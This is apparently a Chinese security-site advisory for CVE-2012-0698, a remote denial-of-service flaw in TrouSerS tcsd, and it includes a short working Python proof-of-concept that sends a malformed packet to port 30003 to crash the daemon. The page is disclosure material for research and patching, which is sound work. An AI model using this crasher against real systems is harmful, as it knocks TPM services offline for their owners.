首页 / 操作系统 / Linux / TrouSerS tcsd拒绝服务漏洞

发布日期：2012-11-26
更新日期：2012-11-28受影响系统：
sourceforge trousers < 0.3.10
sourceforge trousers
描述：
--------------------------------------------------------------------------------
CVE（CAN） ID: CVE-2012-0698Trousers是开源TCG软件栈。tcsd是登录TPM设备驱动程序的唯一入口。TrouSerS 0.3.10之前版本内的tcsd在实现上存在安全漏洞，通过将带有特制type_offset值的TCP报文发送到端口30003，远程攻击者可利用此漏洞造成拒绝服务。<*来源：Andy Lutomirski
 
  链接：http://www.exploit-db.com/exploits/22904/
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！# crash_tcsd.py
# Copyright （c） 2012 Andy Lutomirski.  All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.import struct
import socket
import time# UnloadBlob_PCR_EVENT also appears buggy.crasher = struct.pack（">IIIIIII",
                      28, # packet_size = sizeof（tcsd_packet_hdr）
                      11, # ordinal: LoadKeyByBlob
                      1, # num_parms = 1 （so first getData doesn"t bail）
                      0, # type_size = 0
                      0x80000000, # type_offset is off in lala land
                      0, # parm_size = 0 （skip checking）
                      28, # parm_offset: see getTCSDPacket
                      ）s = socket.socket（socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP）
s.connect（（"127.0.0.1", 30003））
s.send（crasher）
s.shutdown（socket.SHUT_WR）
s.close（）建议：
--------------------------------------------------------------------------------
厂商补丁：sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://trousers.git.sourceforge.net/git/gitweb.cgi？p=trousers/trousers;a=commit;h=ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786Tor SENDME信元处理远程拒绝服务漏洞OpenVAS Manager manage_sql.c send_to_sourcefire任意代码执行漏洞相关资讯      拒绝服务漏洞  TrouSerS安全漏洞  TrouSerS 

数字签名拒绝服务漏洞（CVE-2013-  （11/13/2013 12:25:03） Intel 82574L Gigabit Ethernet   （03/01/2013 21:09:03） Wireshark DTN Dissector 拒绝服务  （02/03/2013 10:37:43）

Rockwell Automation FactoryTalk   （04/10/2013 09:08:12） IBM WebSphere Message Broker多个  （03/01/2013 21:04:45） HP XP P9000 Command View   （02/03/2013 10:36:32）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图